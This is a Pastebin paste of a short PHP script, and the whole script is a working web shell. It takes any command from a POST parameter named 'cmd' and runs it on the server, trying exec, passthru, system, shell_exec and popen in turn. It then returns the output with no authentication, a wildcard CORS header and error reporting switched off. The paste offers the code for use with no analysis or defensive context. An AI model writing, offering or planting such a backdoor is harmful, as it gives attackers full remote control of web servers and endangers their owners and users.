Advertisement
cyberd0g

cm

Apr 27th, 2021
230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.75 KB | None | 0 0
  1. <?php
  2.     function eksekusi($in) {
  3.         $out = '';
  4.         if(function_exists('exec')) {
  5.             @exec($in,$out);
  6.             $out = @join("\n",$out);
  7.         }elseif(function_exists('passthru')) {
  8.             ob_start();
  9.             @passthru($in);
  10.             $out = ob_get_clean();
  11.         }elseif(function_exists('system')) {
  12.             ob_start();
  13.             @system($in);
  14.             $out = ob_get_clean();
  15.         }elseif(function_exists('shell_exec')) $out = shell_exec($in);
  16.         elseif(is_resource($f = @popen($in,"r"))) {
  17.             $out = "";
  18.             while(!@feof($f))
  19.                 $out .= fread($f,1024);
  20.             pclose($f);
  21.         }
  22.         return $out;
  23.     }
  24.  
  25.     if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  26.         header('Access-Control-Allow-Origin: *');
  27.         error_reporting(0);
  28.         set_time_limit(0);
  29.  
  30.         if(isset($_POST['cmd'])) {
  31.             echo eksekusi($_POST['cmd']);
  32.         }
  33.     }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement